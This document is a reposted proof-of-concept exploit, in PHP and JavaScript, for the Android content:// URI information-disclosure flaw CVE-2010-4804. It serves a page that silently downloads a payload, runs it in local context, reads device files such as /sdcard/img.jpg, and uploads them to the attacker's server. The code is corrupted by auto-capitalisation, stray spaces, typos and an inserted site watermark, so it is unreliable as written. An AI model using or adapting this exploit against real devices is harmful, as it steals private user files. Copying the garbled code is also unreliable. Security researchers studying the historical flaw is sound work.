Android 'content: // multiple information leaks in 'uri

 

<? Php

/*

* Description: Android 'content: // 'uri Multiple Information Disclosure Vulnerabilities

* Bugtraq ID: 48256

* CVE: CVE-2010-4804

* Affected: Android <2.3.4

* Author: Thomas Cannon

* Discovered: 18-Nov-2010

* Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/

*

* Filename: poc. php

* Instructions: Specify files you want to upload in filenames array. Host this php file

* On a server and visit it using the Android Browser. Some builds of Android

* May require adjustments to the script, for example when a German build was

* Tested it downloaded the payload as. htm instead of. html, even though. html

* Was specified.

*

* Tested on: HTC Desire (UK Version) with Android 2.2

*/

 

// List of the files on the device that we want to upload to our server

$ Filenames = array ("/proc/version", "/sdcard/img.jpg ");

 

// Determine the full URL of this script

$ Protocol = $ _ SERVER ["HTTPS"] = "on "? "Https": "http ";

$ Scripturl = $ protocol. ": //". $ _ SERVER ["HTTP_HOST"]. $ _ SERVER ["SCRIPT_NAME"];

 

// Stage 0: Display introduction text and a link to start the PoC.

Function stage0 ($ scripturl ){

Echo "<B> Android <2.3.4 </B> <br> Data Stealing Web Page <br> Click: <a href = \" $ scripturl? Stage = 1 \ "> Malicious Link </a> ";

}

 

// Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect

// To the payload. We load the payload using a Content Provider so that the JavaScript is executed in

// Context of the local device-this is the vulnerability.

Function stage1 ($ scripturl ){

Echo "<body onload = \" setTimeout ('window. location = \ '$ scripturl? Stage = 2 \ '', 1000); setTimeout ('window. location = \ 'content: // com.android.html fileprovider/sdcard/download/poc.html \ '', 5000); \"> ";

}

 

// Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.

// The payload uses AJAX cballs to read file contents and encodes as Base64, then uploads to server (Stage 3 ).

Function stage2 ($ scripturl, $ filenames ){

Header ("Cache-Control: public ");

Header ("Content-Description: File Transfer ");

Header ("Content-Disposition: attachment; filename=poc.html ");

Header ("Content-Type: text/html ");

Header ("Content-Transfer-Encoding: binary ");

?>

<Html>

<Body>

<Script language = 'javascript '>

Var filenames = Array ('<? Php echo implode ("','", $ filenames);?> ');

Var filecontents = new Array ();

Function processBinary (xmlhttp ){

Data = xmlhttp. responseText; r = ''; size = data. length;

For (var I = 0; I <size; I ++) r + = String. fromCharCode (data. charCodeAt (I) & 0xff );

Return r;

}

Function getFiles (filenames ){

For (var filename in filenames ){

Filename = filenames [filename];

Xhr = new XMLHttpRequest ();

Xhr. open ('get', filename, false );

Xhr. overrideMimeType ('text/plain; charset = x-user-defined ');

Xhr. onreadystatechange = function () {if (xhr. readyState = 4) {filecontents [filename] = btoa (processBinary (xhr ));}}

Xhr. send ();

}

}

Function addField (form, name, value ){

Var fe = document. createElement ('input ');

Fe. setAttribute ('type', 'ddd ');

Fe. setAttribute ('name', name );

Fe. setAttribute ('value', value );

Form. appendChild (fe );

}

Function uploadFiles (filecontents ){

Var form = document. createElement ('form ');

Form. setAttribute ('method', 'post ');

Form. setAttribute ('enabledype ', 'multipart/form-data ');

Form. setAttribute ('action', '<? = $ Scripturl?>? Stage = 3 ');

Var I = 0;

For (var filename in filecontents ){

AddField (form, 'filename' + I, btoa (filename ));

AddField (form, 'data' + I, filecontents [filename]);

I + = 1;

}

Document. body. appendChild (form );

Form. submit ();

}

GetFiles (filenames );

UploadFiles (filecontents );

</Script>

</Body>

</Html>

<? Php

} Www.2cto.com

 

// Stage 3: Read the file names and contents sent by the payload and write to a file on the server.

Function stage3 (){

$ Fp = fopen ("files.txt", "w") or die ("Couldn't open file for writing! ");

Fwrite ($ fp, print_r ($ _ POST, TRUE) or die ("Couldn't write data to file! ");

Fclose ($ fp );

Echo "Data uploaded to <a href = \" files.txt \ "> files.txt </a>! ";

}

 

// Select the stage to run depending on the parameter passed in the URL

Switch ($ _ GET ["stage"]) {

Case "1 ":

Stage1 ($ scripturl );

Break;

Case "2 ":

Stage2 ($ scripturl, $ filenames );

Break;

Case "3 ":

Stage3 ();

Break;

Default:

Stage0 ($ scripturl );

Break;

}

?>